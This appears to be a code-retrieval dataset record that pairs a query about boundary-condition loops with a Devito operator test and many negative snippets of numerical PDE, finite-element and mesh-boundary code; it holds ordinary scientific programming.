[ "0.6225104", "0.61606276", "0.60171777", "0.59855527", "0.5899436", "0.5890807", "0.57126755", "0.56421477", "0.5499632", "0.5453681", "0.54009974", "0.53884566", "0.53690064", "0.534088", "0.5325772", "0.5315858", "0.530437", "0.5300429", "0.52890176", "0.5282546", "0.52745104", "0.5273178", "0.5268156", "0.52672786", "0.52665734", "0.52570873", "0.5230689", "0.5218409", "0.521682", "0.5206447", "0.52033246", "0.5190876", "0.5172476", "0.51574016", "0.5147732", "0.5144025", "0.51393306", "0.51385033", "0.51261693", "0.51226014", "0.5118929", "0.5102286", "0.5098599", "0.50902086", "0.50893354", "0.50843817", "0.50836176", "0.5078468", "0.506827", "0.5067612", "0.5065614", "0.5054767", "0.50530916", "0.50505334", "0.5048112", "0.5046467", "0.50453806", "0.50193775", "0.50153565", "0.5003251", "0.5002558", "0.5001993", "0.50007886", "0.49991366", "0.49980867", "0.49926907", "0.4992489", "0.49901158", "0.49858645", "0.49818453", "0.49812666", "0.4981111", "0.49784097", "0.49756134", "0.49697188", "0.49696308", "0.49695843", "0.4964584", "0.49517176", "0.4950993", "0.4947086", "0.49465567", "0.49452066", "0.4943919", "0.49399668", "0.4927577", "0.4926833", "0.49246964", "0.4921574", "0.49148595", "0.49144667", "0.49130312", "0.49087495", "0.48986292", "0.4897352", "0.48937902", "0.48914686", "0.4890034", "0.48898396", "0.48830923" ]
0.6123395
2
Emulates a potential implementation of boundary condition loops
def test_directly_indexed_expression(self, fa, ti0, t0, exprs): eqs = EVAL(exprs, ti0.base, t0) op = Operator(eqs, dse='noop', dle='noop') trees = retrieve_iteration_tree(op) assert len(trees) == 2 assert trees[0][-1].nodes[0].expr.rhs == eqs[0].rhs assert trees[1][-1].nodes[0].expr.rhs == eqs[1].rhs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def simulate_boundary(self,print_every=1000,do_F_bound=True):\n n_t = self.t_span.size\n self.n_t = n_t\n x = self.x0.copy()\n self._triangulate(x)\n self.assign_vertices()\n x = self.check_boundary(x)\n self.x = x.copy()\n self.x_save = np.ones((n_t,int(self.n_c*self.b_extra),2))*np.nan\n self.tri_save = -np.ones((n_t,int(self.tris.shape[0]*self.b_extra),3),dtype=np.int32)\n self.generate_noise_boundary()\n if do_F_bound is True:\n for i in range(n_t):\n if i % print_every == 0:\n print(i / n_t * 100, \"%\")\n self.triangulate(x,recalc_angles=True)\n self.assign_vertices()\n x = self.check_boundary(x)\n self.tri_save[i,:self.tris.shape[0]] = self.tris\n self.get_A(self.neighbours,self.vs)\n self.get_P(self.neighbours,self.vs)\n F = self.get_F(self.neighbours,self.vs)\n # F_bend = get_F_bend(self.n_c, self.CV_matrix, self.n_C, x, self.zeta)\n F_soft = weak_repulsion_boundary(self.Cents,self.a,self.k, self.CV_matrix,self.n_c,self.n_C)\n F_bound = boundary_tension(self.Gamma_bound,self.n_C,self.n_c,self.Cents,self.CV_matrix)\n x += self.dt*(F + F_soft + self.v0*self.noise[i,:x.shape[0]] + F_bound)\n # + F_bend + F_bound\n\n self.x = x\n self.x_save[i,:x.shape[0]] = x\n else:\n for i in range(n_t):\n if i % print_every == 0:\n print(i / n_t * 100, \"%\")\n self.triangulate(x, recalc_angles=True)\n self.assign_vertices()\n x = self.check_boundary(x)\n self.tri_save[i, :self.tris.shape[0]] = self.tris\n self.get_A(self.neighbours, self.vs)\n self.get_P(self.neighbours, self.vs)\n F = self.get_F(self.neighbours, self.vs)\n F_soft = weak_repulsion_boundary(self.Cents, self.a, self.k, self.CV_matrix, self.n_c, self.n_C)\n x += self.dt * (F + F_soft + self.v0 * self.noise[i, :x.shape[0]])\n\n self.x = x\n self.x_save[i, :x.shape[0]] = x\n print(\"Simulation complete\")\n return self.x_save", "def boundary_conditions(self):\n ce = 2 * self.dy * self.g * self.mu * self.m_u / self.kb\n self.e[0, :] = (4 * self.e[1, :] - self.e[2, :]) / (\n ce / self.T[0, :] + 3\n )\n self.rho[0, :] = (\n self.e[0, :]\n * (self.Y - 1)\n * self.mu\n * self.m_u\n / (self.kb * self.T[0, :])\n )\n self.u[0, :] = (4 * self.u[1, :] - self.u[2, :]) / 3\n self.w[0, :] = 0\n\n self.e[-1, :] = (4 * self.e[-2, :] - self.e[-3, :]) / (\n 3 - ce / self.T[-1, :]\n )\n self.rho[-1, :] = (\n self.e[-1, :]\n * (self.Y - 1)\n * self.mu\n * self.m_u\n / (self.kb * self.T[-1, :])\n )\n self.u[-1, :] = (4 * self.u[-2, :] - self.u[-3, :]) / 3\n self.w[-1, :] = 0", "def apply_boundary_conditions(self):\n E = self.__mesh.get_edge_list()\n\n # Top and bottom wall Dirichlet bcs (boundary_id = 21)\n \n e21_iterator = self.__mesh.edge_iterator(21)\n\n self.edge_center_value[e21_iterator[0]:e21_iterator[1]+1] = 0.0 \n \n # Left Dirichlet bc (boundary_id = 2)\n \n e2_iterator = self.__mesh.edge_iterator(2)\n\n b = np.sin(np.pi*self.y_e[e2_iterator[0]:e2_iterator[1]+1])\n\n self.edge_center_value[e2_iterator[0]:e2_iterator[1]+1] \\\n = b\n \n # Right Neumann bc (Zero flux, boundary_id = 3)\n \n e3_iterator = self.__mesh.edge_iterator(3)\n \n for i in range(e3_iterator[0], e3_iterator[1]+1):\n LC = E[i].get_straddling_cells()\n n = LC.get_global_cell_number() - 1\n self.edge_center_value[i] = self.cell_centroid_value[n]", "def set_internal_boundary_conditions(self, model):\n\n def boundary_gradient(left_symbol, right_symbol):\n pybamm.logger.debug(\n \"Calculate boundary gradient ({} and {})\".format(\n left_symbol, right_symbol\n )\n )\n left_domain = left_symbol.domain[0]\n right_domain = right_symbol.domain[0]\n\n left_mesh = 
self.spatial_methods[left_domain].mesh[left_domain]\n right_mesh = self.spatial_methods[right_domain].mesh[right_domain]\n\n left_symbol_disc = self.process_symbol(left_symbol)\n right_symbol_disc = self.process_symbol(right_symbol)\n\n return self.spatial_methods[left_domain].internal_neumann_condition(\n left_symbol_disc, right_symbol_disc, left_mesh, right_mesh\n )\n\n bc_keys = list(self.bcs.keys())\n\n internal_bcs = {}\n for var in model.boundary_conditions.keys():\n if isinstance(var, pybamm.Concatenation):\n children = var.orphans\n\n first_child = children[0]\n next_child = children[1]\n\n lbc = self.bcs[var][\"left\"]\n rbc = (boundary_gradient(first_child, next_child), \"Neumann\")\n\n if first_child not in bc_keys:\n internal_bcs.update({first_child: {\"left\": lbc, \"right\": rbc}})\n\n for current_child, next_child in zip(children[1:-1], children[2:]):\n lbc = rbc\n rbc = (boundary_gradient(current_child, next_child), \"Neumann\")\n if current_child not in bc_keys:\n internal_bcs.update(\n {current_child: {\"left\": lbc, \"right\": rbc}}\n )\n\n lbc = rbc\n rbc = self.bcs[var][\"right\"]\n if children[-1] not in bc_keys:\n internal_bcs.update({children[-1]: {\"left\": lbc, \"right\": rbc}})\n\n self.bcs.update(internal_bcs)", "def boundary_sim(x0y0, exy0, a, X,D, xmin,ymax, R2,c, tmax,expmt, PBC, vb=False):\r\n\tme = \"LE_2DLBS.boundary_sim: \"\r\n\t\r\n\t## Initialisation\r\n\tx0,y0 = x0y0\r\n\tnstp = int(tmax/dt)\r\n\texstp = nstp/10\r\n\tif vb: print me+\"a = \",a,\"; (x0,y0) =\",np.around(x0y0,2)\r\n\t\r\n\t## Simulate eta\r\n\tif vb: t0 = time.time()\r\n\tex = sim_eta(exy0[0], expmt, nstp, a, dt)\r\n\tey = sim_eta(exy0[1], expmt, nstp, a, dt)\r\n\tif vb: print me+\"Simulation of eta\",round(time.time()-t0,1),\"seconds for\",nstp,\"steps\"\r\n\t\r\n\t## Spatial variables\r\n\tif vb: t0 = time.time()\r\n\t\r\n\t## Construct y with periodic boundaries\r\n\ty = calculate_y(y0,ey,ymax,PBC)\r\n\t\r\n\t## Iteratively compute x\r\n\tx = np.zeros(nstp); x[0] = x0\r\n\ti,j = 0,0\r\n\t## Euler steps to calculate x(t)\r\n\twhile x[i] > xmin:\r\n\t\tx[i+1] = x[i] + dt*( force_2D(x[i],y[i],R2,c) + ex[i] )\r\n\t\ti +=1\r\n\t\t## Extend array if necessary\r\n\t\tif i == len(x)-1:\r\n\t\t\tex = np.append(ex,sim_eta(ex[-1],expmt[:exstp],exstp,a,dt))\r\n\t\t\tx = np.append(x,np.zeros(exstp))\r\n\t\t\tey_2 = sim_eta(ey[-1],expmt[:exstp],exstp,a,dt)\r\n\t\t\tey = np.append(ey,ey_2)\r\n\t\t\ty = np.append(y,calculate_y(y[-1],ey_2,ymax,PBC))\r\n\t\t\tj += 1\r\n\tif j>0: print me+\"trajectory array extended\",j,\"times.\"\r\n\tif vb: print me+\"Simulation of x\",round(time.time()-t0,1),\"seconds for\",i,\"steps\"\r\n\t\r\n\t## Clip trailing zeroes from y and x\r\n\tx, y = x[:i], y[:i]\t\r\n\treturn [x,y]", "def GetBoundaryLoops(self):\n\n self.__do_essential_memebers_exist__()\n\n if self.InferBoundaryElementType() != \"line\":\n raise NotImplementedError(\"Computing boundary loops is only supported for tri/quad meshes for now\")\n\n self.GetEdges()\n\n # First create a node to neighbour map i.e. 
node as key and its two neighbouring nodes as value\n nodeToNeighboursMap = dict()\n for i in range(self.edges.shape[0]):\n\n if self.edges[i,0] not in nodeToNeighboursMap:\n nodeToNeighboursMap[self.edges[i,0]] = [self.edges[i,1],-1]\n else:\n nodeToNeighboursMap[self.edges[i,0]][1] = self.edges[i,1]\n\n if self.edges[i,1] not in nodeToNeighboursMap:\n nodeToNeighboursMap[self.edges[i,1]] = [self.edges[i,0],-1]\n else:\n nodeToNeighboursMap[self.edges[i,1]][1] = self.edges[i,0]\n\n # Now create a vector of face loops\n faceLoops = []\n while nodeToNeighboursMap:\n # Insert the first node from node to edge map and its two neighbours in order and erase it from the map\n faceLoop = []\n mapBegin = next(iter(nodeToNeighboursMap))\n faceLoop.append(nodeToNeighboursMap[mapBegin][0])\n faceLoop.append(mapBegin)\n faceLoop.append(nodeToNeighboursMap[mapBegin][1])\n nodeToNeighboursMap.pop(mapBegin, None)\n\n while True:\n # Pick the last node in the current face loop and find its neighbours\n if faceLoop[-1] in nodeToNeighboursMap:\n tmp = faceLoop[-1]\n mapIter = nodeToNeighboursMap[faceLoop[-1]]\n # Check if we have not reached the end of the loop i.e. the first element\n if mapIter[0] != faceLoop[0] and mapIter[1] != faceLoop[0]:\n if mapIter[0] == faceLoop[-2]:\n faceLoop.append(mapIter[1])\n elif mapIter[1] == faceLoop[-2]:\n faceLoop.append(mapIter[0])\n else:\n nodeToNeighboursMap.pop(faceLoop[0], None)\n\n nodeToNeighboursMap.pop(tmp, None)\n else:\n faceLoop = np.array(faceLoop)\n faceLoops.append(faceLoop)\n break\n\n return faceLoops", "def boundary_conditions(particle_outer_radius, boundary_temp):\n\n boundary_condition = [particle_outer_radius, boundary_temp]\n\n return boundary_condition", "def algorithm_loop(self):", "def solve_step(self, bc_left=0):\n status = 0\n self.t += self.dt\n\n\n ### Construct the RHS vector\n # Implicit terms\n #cff1 = 0. # Fully implicit\n #cff2 = 0.\n cff1 = 0.5*(1. 
- 2.*self.c_im)*self.dt\n cff2 = 0.5*self.c_im*self.dt\n RHS = cff1*self.L_rhs.dot(self.B) +\\\n cff2*self.L_rhs.dot(self.B_n_m1)\n\n # Nonlinear (explicit) terms\n cff3 = self.dt*(3 + self.b_ex)*0.5\n cff4 = -self.dt*(1+2*self.b_ex)*0.5\n cff5 = self.dt*(self.b_ex)*0.5\n \n RHS += cff3*self.calc_nonlinear_rhs(self.B)\n RHS += cff4*self.calc_nonlinear_rhs(self.B_n_m1)\n RHS += cff5*self.calc_nonlinear_rhs(self.B_n_m2)\n\n # Other terms from the time-derivative\n RHS += self.B\n\n # Add the BCs to the RHS\n cff0 = 0.5*(1 + self.c_im)*self.dt\n self.add_bcs(RHS, bc_left, cff0, cff1, cff2)\n\n # Use the direct banded matrix solver (faster)\n self.B_n_p1[:] = la.solve_banded( (self._j,self._j), self.L_lhs.data[::-1,:], RHS)\n\n # Check solutions\n if np.any( np.isnan(self.B_n_p1)):\n return -1\n\n # Update the terms last\n self.B_n_m2[:] = self.B_n_m1\n self.B_n_m1[:] = self.B\n self.B[:] = self.B_n_p1\n\n ## Update the boundary terms in these equations\n self.bcs[2] = self.bcs[1]\n self.bcs[1] = self.bcs[0]\n self.bcs[0] = bc_left\n\n return status", "def test_solvers_bc():\n tol = 3E-12 # Appropriate tolerance for these tests (P2, 20x20 mesh)\n import sympy as sym\n x, y = sym.symbols('x[0], x[1]')\n u = 1 + x**2 + 2*y**2\n f = -sym.diff(u, x, 2) - sym.diff(u, y, 2)\n f = sym.simplify(f)\n u_00 = u.subs(x, 0) # x=0 boundary\n u_01 = u.subs(x, 1) # x=1 boundary\n g = -sym.diff(u, y).subs(y, 1) # x=1 boundary\n r = 1000 # arbitrary function can go here\n s = u\n\n # Turn to C/C++ code for UFL expressions\n f = sym.printing.ccode(f)\n u_00 = sym.printing.ccode(u_00)\n u_01 = sym.printing.ccode(u_01)\n g = sym.printing.ccode(g)\n r = sym.printing.ccode(r)\n s = sym.printing.ccode(s)\n print('Test problem (C/C++):\\nu = %s\\nf = %s' % (u, f))\n print('u_00: %s\\nu_01: %s\\ng = %s\\nr = %s\\ns = %s' %\n (u_00, u_01, g, r, s))\n\n # Turn into FEniCS objects\n u_00 = Expression(u_00)\n u_01 = Expression(u_01)\n f = Expression(f)\n g = Expression(g)\n r = Expression(r)\n s = Expression(s)\n u_exact = Expression(sym.printing.ccode(u))\n\n # Define boundary conditions\n boundary_conditions = {0: {'Dirichlet': u_00},\n 1: {'Dirichlet': u_01},\n 2: {'Robin': (r, s)},\n 3: {'Neumann': g}}\n\n for Nx, Ny in [(3,3), (3,5), (5,3), (20,20)]:\n for degree in 1, 2, 3:\n for linear_solver in ['direct']:\n print('solving on 2(%dx%dx) mesh with P%d elements'\n % (Nx, Ny, degree)),\n print(' %s solver, %s function' %\n (linear_solver, solver_func.__name__))\n kappa = Constant(1)\n u, kappa = solver_bc(\n kappa, f, boundary_conditions, Nx, Ny, degree,\n linear_solver=linear_solver,\n abs_tol=0.1*tol,\n rel_tol=0.1*tol)\n # Make a finite element function of the exact u_D\n V = u.function_space()\n u_e_Function = interpolate(u_exact, V) # exact solution\n # Check that dof arrays are equal\n u_e_array = u_e_Function.vector().array() # dof values\n max_error = (u_e_array - u.vector().array()).max()\n msg = 'max error: %g for 2(%dx%d) mesh, degree=%d,'\\\n ' %s solver, %s' % \\\n (max_error, Nx, Ny, degree, linear_solver,\n solver_func.__name__)\n print(msg)\n assert max_error < tol, msg", "def nonlinear_electroelastodynamics(optimise=True):\n\n mesh = Mesh()\n mesh.Parallelepiped(upper_right_front_point=(1,1,0.001),nx=10,ny=10,nz=1, element_type=\"hex\")\n\n mu = 5.0e4\n mu1 = mu\n mu2 = mu\n eps_2 = 4.0*8.8541e-12\n v = 0.4\n lamb = 2.*mu*v/(1-2.*v)\n material = IsotropicElectroMechanics_108(3, mu1=mu1, mu2=mu2, lamb=lamb, eps_2=eps_2, rho=1200.)\n\n formulation = DisplacementPotentialFormulation(mesh)\n\n\n def 
dirichlet_function(mesh):\n\n boundary_data = np.zeros((mesh.points.shape[0],4))+np.NAN\n\n Z_0 = np.logical_and(np.isclose(mesh.points[:,0],0.),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n Z_0 = np.logical_and(np.isclose(mesh.points[:,1],0.),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n Z_0 = np.logical_and(np.isclose(mesh.points[:,0],1),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n Z_0 = np.logical_and(np.isclose(mesh.points[:,1],1),np.isclose(mesh.points[:,2],0.))\n boundary_data[Z_0,:3] = 0.\n\n Z_0 = np.isclose(mesh.points[:,2],0.)\n boundary_data[Z_0,3] = 0.\n\n Z_0 = np.isclose(mesh.points[:,2],.001)\n boundary_data[Z_0,3] = 9e3\n\n return boundary_data\n\n boundary_condition = BoundaryCondition()\n boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n nonlinear_static_solver = FEMSolver(total_time=60.,\n number_of_load_increments=25,\n analysis_nature=\"nonlinear\",\n analysis_type=\"static\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n )\n\n nonlinear_static_results = nonlinear_static_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n nonlinear_dynamic_solver = FEMSolver(total_time=60.,\n number_of_load_increments=250,\n analysis_nature=\"nonlinear\",\n analysis_type=\"dynamic\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n compute_energy_dissipation=True,\n compute_linear_momentum_dissipation=True,\n )\n\n nonlinear_dynamic_results = nonlinear_dynamic_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n # boundary_condition.__reset_state__()\n # boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n # nonlinear_dynamic_solver_exp = FEMSolver(total_time=6.,\n # number_of_load_increments=200000,\n # save_frequency=200000,\n # analysis_nature=\"nonlinear\",\n # analysis_type=\"dynamic\",\n # analysis_subtype=\"explicit\",\n # newton_raphson_tolerance=1e-5,\n # newton_raphson_solution_tolerance=1e-11,\n # optimise=optimise,\n # print_incremental_log=True,\n # )\n\n # nonlinear_dynamic_results_exp = nonlinear_dynamic_solver_exp.Solve(formulation=formulation, mesh=mesh,\n # material=material, boundary_condition=boundary_condition)\n\n\n boundary_condition.__reset_state__()\n boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n linear_static_solver = FEMSolver(total_time=60.,\n number_of_load_increments=250,\n analysis_nature=\"linear\",\n analysis_type=\"static\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n )\n\n linear_static_results = linear_static_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, boundary_condition=boundary_condition)\n\n\n boundary_condition.__reset_state__()\n boundary_condition.SetDirichletCriteria(dirichlet_function, mesh)\n\n linear_dynamic_solver = FEMSolver(total_time=60.,\n number_of_load_increments=1000,\n analysis_nature=\"linear\",\n analysis_type=\"dynamic\",\n newton_raphson_tolerance=1e-5,\n newton_raphson_solution_tolerance=1e-11,\n optimise=optimise,\n print_incremental_log=True,\n break_at_increment=100,\n )\n\n linear_dynamic_results = linear_dynamic_solver.Solve(formulation=formulation, mesh=mesh,\n material=material, 
boundary_condition=boundary_condition)\n\n\n s1 = nonlinear_static_results.GetSolutionVectors()\n s2 = nonlinear_dynamic_results.GetSolutionVectors()\n # s3 = nonlinear_dynamic_results_exp.GetSolutionVectors()\n s4 = linear_static_results.GetSolutionVectors()\n s5 = linear_dynamic_results.GetSolutionVectors()\n\n norm = lambda x: np.linalg.norm(x[:,2,-1])\n assert norm(s1) > 0.13 and norm(s1) < 0.15\n assert norm(s2) > 0.13 and norm(s2) < 0.15\n assert norm(s4) > 0.13 and norm(s4) < 0.15", "def _apply_boundary_conditions(self,t,dt):\n # update coloured noise generator\n self.noise_gen.update(dt)\n # extract four corner values for each of u and v fields as component\n # mean plus current noise generator output\n corner_mean_index = int(scipy.floor(t/self.wind_update_period))\n added_noise = self.noise_gen.output\n (u_tl, u_tr, u_bl, u_br, v_tl, v_tr, v_bl, v_br) = \\\n added_noise + self._corner_means[corner_mean_index,:]\n # linearly interpolate along edges\n self._u[:, 0] = u_tl + self._rx * (u_tr - u_tl) # u top edge\n self._u[:, -1] = u_bl + self._rx * (u_br - u_bl) # u bottom edge\n self._u[0, :] = u_tl + self._ry * (u_bl - u_tl) # u left edge\n self._u[-1, :] = u_tr + self._ry * (u_br - u_tr) # u right edge\n self._v[:, 0] = v_tl + self._rx * (v_tr - v_tl) # v top edge\n self._v[:, -1] = v_bl + self._rx * (v_br - v_bl) # v bottom edge\n self._v[0, :] = v_tl + self._ry * (v_bl - v_tl) # v left edge\n self._v[-1, :] = v_tr + self._ry * (v_br - v_tr) # v right edge", "def _solve_implicit(self, initial_conditions):\n coeff = self.a ** 2 * self.tau / self.h ** 2\n l_and_u = (1, 1)\n ab = np.empty((3, self.n_x))\n # main diagonal\n ab[1] = 1 + 2.0 * coeff\n # upper and lower diagonals\n ab[0] = ab[2] = -coeff\n\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n ab[0][1] = 0 # upper diagonal\n ab[1][0] = 1 # main diagonal\n elif self.left_bc_type == \"NEUMANN\":\n ab[0][1] = 1 # upper diagonal\n ab[1][0] = -1 # main diagonal\n\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n ab[1][-1] = 1 # main diagonal\n ab[2][-2] = 0 # lower diagonal\n elif self.right_bc_type == \"NEUMANN\":\n ab[1][-1] = 1 # main diagonal\n ab[2][-2] = -1 # lower diagonal\n\n current_solution = initial_conditions\n solutions = []\n\n for t in self.t_grid:\n b = current_solution + self.tau * self.rhs(self.x_grid, t)\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n b[0] = self.left_bc(t)\n elif self.left_bc_type == \"NEUMANN\":\n b[0] = self.h * self.left_bc(t)\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n b[-1] = self.right_bc(t)\n elif self.right_bc_type == \"NEUMANN\":\n b[-1] = self.h * self.right_bc(t)\n\n next_solution = solve_banded(l_and_u, ab, b)\n if self.mode == \"VISUALIZATION\":\n solutions.append((t, next_solution.copy()))\n current_solution = next_solution\n if self.mode == \"TEST\":\n # print(\"Result: \", current_solution.tolist())\n # print(\"Right answer: \", self.anl_solution.tolist())\n self._norma(current_solution)\n elif self.mode == \"VISUALIZATION\":\n return solutions", "def _handle_bounds_speedj(self):\n inside_bound, inside_buffer_bound, mat, xyz = self._check_bound(self._qt_[-1])\n inside_angle_bound = np.all(self._angles_low <= self._qt_[-1, self._joint_indices]) and \\\n np.all(self._qt_[-1, self._joint_indices] <= self._angles_high)\n if inside_bound:\n self.return_point = None\n if inside_angle_bound:\n self.angle_return_point = False\n if not inside_bound:\n if self.return_point is None:\n # we are outside the bounds and return point wasn't computed yet\n 
print(\"outside box bound\")\n xyz = np.clip(xyz, self._end_effector_low + self._box_bound_buffer,\n self._end_effector_high - self._box_bound_buffer)\n mat[:3, 3] = xyz\n ref_pos = self._q_ref.copy()\n ref_pos[self._joint_indices] = self._q_[-1, self._joint_indices]\n solutions = ur_utils.inverse_near(mat, wrist_desired=self._q_ref[-1], ref_pos=ref_pos,\n params=self._ik_params)\n servoj_q = self._q_ref.copy()\n if len(solutions) == 0:\n servoj_q[self._joint_indices] = self._q_[-1, self._joint_indices]\n else:\n servoj_q[self._joint_indices] = solutions[0][self._joint_indices]\n self.return_point = servoj_q[self._joint_indices]\n # Speed at which arm approaches the boundary. The faster this speed,\n # the larger opposite acceleration we need to apply in order to slow down\n self.init_boundary_speed = np.max(np.abs(self._qd_.copy()))\n # if return point is already computed, keep going to it, no need\n # to recompute it at every time step\n self._cmd_ = self.return_point - self._q_[0][self._joint_indices]\n # Take the direction to return point and normalize it to have norm 0.1\n if np.linalg.norm(self._cmd_) != 0:\n self._cmd_ /= np.linalg.norm(self._cmd_) / 0.1\n\n self._speedj_packet[1:1 + 6][self._joint_indices] = self._cmd_\n # This acceleration guarantees that we won't move beyond\n # the bounds by more than 0.05 radian on each joint. This\n # follows from kinematics equations.\n accel_to_apply = np.max(np.abs(self._qd_)) * self.init_boundary_speed / 0.05\n\n # self.boundary_packet[1:1 + 6][self.joint_indices] = self.return_point\n # self.actuator_comms['UR5'].actuator_buffer.write(self.reset_packet)\n # time.sleep(1.0)\n self._speedj_packet[-2] = np.clip(accel_to_apply, 2.0, 5.0)\n self._actuation_packet_['UR5'] = self._speedj_packet\n self._cmd_.fill(0.0)\n self._cmd_prev_.fill(0.0)\n self._first_deriv_.fill(0.0)\n\n elif not inside_angle_bound:\n # if return point is already computed, keep going to it, no need\n self.rel_indices = self._joint_indices\n cur_pos = self._q_[0][self._joint_indices]\n clipped_pos = np.clip(cur_pos, self._angles_low + self._angle_bound_buffer,\n self._angles_high - self._angle_bound_buffer)\n # a point within the box to which we will be returning\n affected_joints = np.where(clipped_pos != cur_pos)\n if not self.angle_return_point:\n print(\"outside of angle bound on joints %r\" % (list(affected_joints[0])))\n self.angle_return_point = True\n self._cmd_[affected_joints] = np.sign(clipped_pos - cur_pos)[affected_joints]*np.max(np.abs(self._cmd_))\n self._speedj_packet[1:1 + 6][self._joint_indices] = self._cmd_\n self._actuation_packet_['UR5'] = self._speedj_packet", "def make_divergence(bcs: Boundaries) -> OperatorType:\n assert isinstance(bcs.grid, CylindricalSymGrid)\n bcs.check_value_rank(0)\n boundary_r, boundary_z = bcs\n\n # calculate preliminary quantities\n dim_r, dim_z = bcs.grid.shape\n dr = bcs.grid.discretization[0]\n scale_r, scale_z = 1 / (2 * bcs.grid.discretization)\n\n value_outer = boundary_r.high.make_virtual_point_evaluator()\n region_z = boundary_z.make_region_evaluator()\n\n # use processing for large enough arrays\n parallel = dim_r * dim_z >= config[\"numba.parallel_threshold\"]\n\n @jit_allocate_out(parallel=parallel, out_shape=(dim_r, dim_z))\n def divergence(arr, out=None):\n \"\"\"apply divergence operator to array `arr`\"\"\"\n for j in nb.prange(0, dim_z): # iterate axial points\n # inner radial boundary condition\n i = 0\n arr_z_l, _, arr_z_h = region_z(arr[1], (i, j))\n d_r = (arr[0, 1, j] + 3 * arr[0, 0, j]) * scale_r\n d_z 
= (arr_z_h - arr_z_l) * scale_z\n out[i, j] = d_r + d_z\n\n for i in range(1, dim_r - 1): # iterate radial points\n arr_z_l, _, arr_z_h = region_z(arr[1], (i, j))\n d_r = (arr[0, i + 1, j] - arr[0, i - 1, j]) * scale_r\n d_r += arr[0, i, j] / ((i + 0.5) * dr)\n d_z = (arr_z_h - arr_z_l) * scale_z\n out[i, j] = d_r + d_z\n\n # outer radial boundary condition\n i = dim_r - 1\n arr_z_l, _, arr_z_h = region_z(arr[1], (i, j))\n arr_r_h = value_outer(arr[0], (i, j))\n d_r = (arr_r_h - arr[0, i - 1, j]) * scale_r\n d_r += arr[0, i, j] / ((i + 0.5) * dr)\n d_z = (arr_z_h - arr_z_l) * scale_z\n out[i, j] = d_z + d_r\n\n return out\n\n return divergence # type: ignore", "def create_bcs(dim, H, Hmin, HZ, HminZ, XYZ, inlet_velocity,\n V_0, solutes, subdomains_file,\n enable_NS, enable_PF, enable_EC, \n mesh, boundaries_Facet, **namespace):\n mvc = df.MeshValueCollection(\"size_t\", mesh, dim-1) \n with df.XDMFFile(subdomains_file) as infile:\n infile.read(mvc, \"name_to_read\")\n facet_domains = df.cpp.mesh.MeshFunctionSizet(mesh, mvc)\n\n # Re-create boundaries with facet_domain for mesh relevance\n\n boundaries = dict(\n inlet = [facet_domains, boundaries_Facet[\"inlet\"]],\n outletL = [facet_domains, boundaries_Facet[\"outletL\"]],\n outletR = [facet_domains, boundaries_Facet[\"outletR\"]],\n wall = [facet_domains, boundaries_Facet[\"wall\"]],\n )\n\n # Alocating the boundary dicts\n bcs = dict()\n bcs_pointwise = dict()\n for boundary in boundaries:\n bcs[boundary] = dict()\n\n ## Velocity Phase Flow In (Retrieve expression)\n #\n #length inlet, water inflow, X/Y/Z, Positive/neg flow along axis\n velocity_expr = velocity_init(H, HZ, inlet_velocity, XYZ, 1, Hmin, HminZ) \n velocity_in = Fixed(velocity_expr)\n\n # Pressure set to 0 at outlet\n pressure_out = Pressure(0.0)\n # Create NoSlip function for walls\n noslip = Fixed((0., 0., 0.)) # Unlike 2D \"NoSlip()\", need 3 dimensions\n\n ## Define boundaries\n # Note we have two outlets\n if enable_NS:\n bcs[\"inlet\"][\"u\"] = velocity_in\n bcs[\"outletL\"][\"p\"] = pressure_out\n bcs[\"outletR\"][\"p\"] = pressure_out\n bcs[\"wall\"][\"u\"] = noslip\n\n # Ensure all processes have completed (Might be redundant) \n mpi_barrier()\n return boundaries, bcs, bcs_pointwise", "def outer_loop(b_i, b_ij, phi_ij, psi_i, lambda_ij, gamma_ij, N):\n # Compute Bethe energy\n bethe_E = bethe_free_energy(b_i, b_ij, psi_i, phi_ij, N)\n conv_crit = numpy.inf\n bethe = [bethe_E]\n triu_idx = numpy.triu_indices(N, 1)\n while conv_crit > 1e-5:\n # Until convergence update Lagrange multipliers and beliefs\n lambda_ij, gamma_ij = inner_loop(b_i, b_ij, phi_ij, psi_i, lambda_ij,\n gamma_ij, N)\n b_i, b_ij = update_beliefs(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n # Compute Bethe energy\n bethe_E_old = bethe_E\n # Compute bethe free energy\n bethe_E = bethe_free_energy(b_i, b_ij, psi_i, phi_ij, N)\n bethe.append(bethe_E)\n conv_crit = numpy.absolute((bethe_E_old - bethe_E) / bethe_E_old)\n\n return b_i, b_ij, bethe_E", "def _while_loop(self):\n bind_map = {}\n wl = set_span(tvm.relay.var(\"while_loop\"), self._loop_name)\n sb = tvm.relay.scope_builder.ScopeBuilder()\n\n lv_list = []\n expr_list = []\n extra_vars = []\n\n for i, lv in enumerate(self.loop_vars):\n if self._loop_name not in self._lvar2expr:\n self._lvar2expr[self._loop_name] = {}\n\n # Handle the case when loop var is not properly lifted.\n # This can happen when loop var node name is set accidentally\n # beginning with loop name.\n if lv not in self._lvar2expr[self._loop_name]:\n var_name = 
